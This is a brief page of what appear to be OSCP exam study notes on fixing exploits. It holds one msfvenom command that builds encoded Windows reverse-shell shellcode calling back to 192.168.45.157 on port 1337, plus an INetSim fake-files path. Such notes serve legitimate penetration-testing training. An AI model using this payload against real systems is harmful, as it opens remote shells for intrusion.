> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/cool/fixing-exploits.md).

# Fixing Exploits

#### Buffer Overflows

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.157 LPORT=1337 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
```

#### Sample Files

```
/var/lib/inetsim/http/fakefiles/
```
